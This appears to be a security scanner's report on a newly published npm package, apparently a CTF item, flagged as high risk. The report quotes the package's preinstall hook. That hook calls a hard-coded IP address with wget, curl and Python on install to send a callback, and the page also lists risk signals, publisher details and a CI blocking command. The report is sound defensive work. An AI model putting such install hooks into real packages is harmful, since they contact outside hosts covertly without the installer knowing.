npm · registry.npmjs.org
ect-839201-ctf
Install Lifecycle Remote Or Exec: preinstall="wget http://10.107.121.85:8000/callback_wget || curl http://10.107.121.85:8000/callback_curl || python3 -c \"import urllib.request; urllib.request.urlopen('http://10.107.121.85:8000/callback_py')\""
Why PkgRadar flagged 1.0.0
| Severity | Signal | Evidence |
|---|---|---|
| high | Install Lifecycle Remote Or Exec | preinstall="wget http://10.107.121.85:8000/callback_wget || curl http://10.107.121.85:8000/callback_curl || python3 -c \"import urllib.request; urllib.request.urlopen('http://10.107.121.85:8000/callback_py')\"" · package.json |
| high | New Account With Lifecycle Hook | package first published 0 day(s) ago, 1 total version(s), has lifecycle hook · package.json |
| medium | Suspicious Publish Context | {"package_age_days":0,"publisher":"rituparnabhattacharyya","burst_same_day":2,"burst_week":2,"lure":null,"version_anomaly":false} |
Scanned versions
| Version | Verdict | Score | Scanned (UTC) |
|---|---|---|---|
1.0.0 | High risk | 45 | 2026-06-12 |
Related campaigns
- rituparnabhattacharyya — 17 releases, max score 85
Block this in CI
pkgradar gate --ecosystem npm [email protected]